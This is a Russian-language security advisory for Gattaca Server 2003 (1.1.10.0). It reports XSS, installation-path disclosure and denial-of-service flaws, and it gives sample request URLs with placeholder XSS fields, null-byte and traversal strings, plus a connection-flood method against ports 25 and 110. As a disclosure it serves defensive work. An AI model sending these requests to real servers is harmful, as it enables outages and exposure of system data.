Несколько уязвимостей в Gattaca Server 2003

Дата публикации:
18.07.2004
Всего просмотров:
716
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Отказ в обслуживании
Раскрытие системных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Gattaca Server 2003 1.x
Уязвимые версии: Gattaca Server 2003 (1.1.10.0)

Описание: Несколько уязвимостей обнаружено в Gattaca Server 2003. Удаленный пользователь может аварийно завершить работу сервера. Удаленный пользователь может определить инсталляционный путь и Web root каталог. Удаленный пользователь может выполнить XSS нападение.

1. XSS:

http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[cod e]//[code]
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=[code]//[code]&LANGUAGE=lang//en
2. Раскрытие пути:
 http://[host]/%00

http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[what ever]
3. DoS (100% CPU):
 
http://[host]/index.tmpl?HELPID=1000&TEMPLA TE=skins//water&LANGUAGE=/
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANG UAGE=.
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=\
http://[host]/web.tmpl?H ELPID=8000&TEMPLATE=skins//[whatever]&LANGUAGE=lang//en
4. Также удаленный пользователь может открыть около 600 подключений к целевому серверу на 25 и 110 TCP порту, чтобы аварийно завершить работу сервера.

URL производителя: http://www.gattaca-server.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Security Advisory

или введите имя

CAPTCHA